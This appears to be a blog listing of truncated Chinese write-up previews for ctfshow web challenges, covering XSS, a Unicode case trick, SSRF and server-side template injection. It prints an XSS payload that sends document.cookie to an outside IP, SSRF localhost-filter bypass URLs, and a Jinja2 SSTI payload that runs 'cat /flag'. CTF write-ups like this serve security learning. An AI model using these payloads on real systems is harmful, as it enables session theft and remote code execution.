web316 反弹cookie到vps123<script>var img = document.createElement("img");img.src = "http://91.67.253.121:1234/?cookie="+document.cookie;a ......
web334 little trick考察js特性: 参考 https://www.leavesongs.com/HTML/javascript-up-low-ercase-tip.html
1234567toUpperCase():ı ==>Iſ ==>StoLowerCase():İ ==> ......
web351直接访问flag.php
POST传参
352 353限制了HTTP协议,ban掉了localhost和127.0.0.1
payload:
1234567url=http://127.1/flag.phpurl=http://0/flag.phpurl=http://0.0.0.0/flag.php ......
361 3621{{ config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }}
363过滤引号
1{{config.__class ......
前言有关SSTI的一些知识 https://www.cnblogs.com/bmjoker/p/13508538.html
SSTI (Server-Side Template Injection),即服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者ge ......